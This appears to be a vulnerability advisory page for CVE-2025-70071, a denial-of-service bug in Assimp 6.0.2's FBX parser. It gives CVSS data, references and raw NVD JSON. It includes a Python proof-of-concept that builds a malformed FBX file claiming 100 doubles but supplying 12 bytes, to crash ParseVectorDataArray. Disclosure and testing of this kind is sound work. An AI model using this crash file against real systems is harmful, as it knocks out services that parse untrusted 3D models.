CVE-2025-70071

Description

An issue in Assimp v.6.0.2 allows a remote attacker to cause a denial of service via the FBXParser.cpp, ParseVectorDataArray()

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Assimp v6.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

def create_malformed_fbx(filename):
    """
    Generates a malformed FBX file to trigger the ParseVectorDataArray crash.
    The file declares a large array of doubles but provides insufficient data.
    """
    # FBX Binary Header
    magic = b'Kaydara FBX Binary\x20\x20\x00\x1a\x00'
    
    # FBX Node Header structure: EndOffset, NumProperties, PropertyListLen, NameLen, Name
    # We create a dummy node to hold the malicious property
    end_offset = 0 # Placeholder
    num_props = 1
    prop_list_len = 25 # 1 byte type + 4 bytes len + 4 bytes encoding + 4 bytes compressed_len + 12 bytes data
    name_len = 1
    name = b'P'
    
    node_header = struct.pack(">IIII", end_offset, num_props, prop_list_len, name_len)
    
    with open(filename, 'wb') as f:
        f.write(magic)
        f.write(node_header)
        f.write(name)
        
        # Property: Array of doubles ('d')
        f.write(b'd')
        
        # Length of array: Claim 100 elements
        array_len = 100
        f.write(struct.pack(">I", array_len))
        
        # Encoding: 0 (Raw, uncompressed)
        f.write(struct.pack(">I", 0))
        
        # Compressed length: 0
        f.write(struct.pack(">I", 0))
        
        # Malformed Data:
        # The parser expects 'array_len * 8' bytes (800 bytes).
        # We intentionally write less data to cause a read overflow or crash.
        f.write(b'\x00' * 12) # Only 12 bytes written
        
    print(f"[+] Malformed FBX file generated: {filename}")

if __name__ == "__main__":
    create_malformed_fbx("exploit_CVE-2025-70071.fbx")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-70071
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-70071
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-70071/
[4] VulDB https://vuldb.com/cve/CVE-2025-70071
[5] http://assimp.com
[6] https://gist.github.com/GunP4ng/6d80919905037929ce9266ccd207b9ea
[7] https://gist.github.com/GunP4ng/6d80919905037929ce9266ccd207b9ea

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-70071", "sourceIdentifier": "[email protected]", "published": "2026-05-04T16:16:01.453", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Assimp v.6.0.2 allows a remote attacker to cause a denial of service via the FBXParser.cpp, ParseVectorDataArray()"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "http://assimp.com", "source": "[email protected]"}, {"url": "https://gist.github.com/GunP4ng/6d80919905037929ce9266ccd207b9ea", "source": "[email protected]"}, {"url": "https://gist.github.com/GunP4ng/6d80919905037929ce9266ccd207b9ea", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}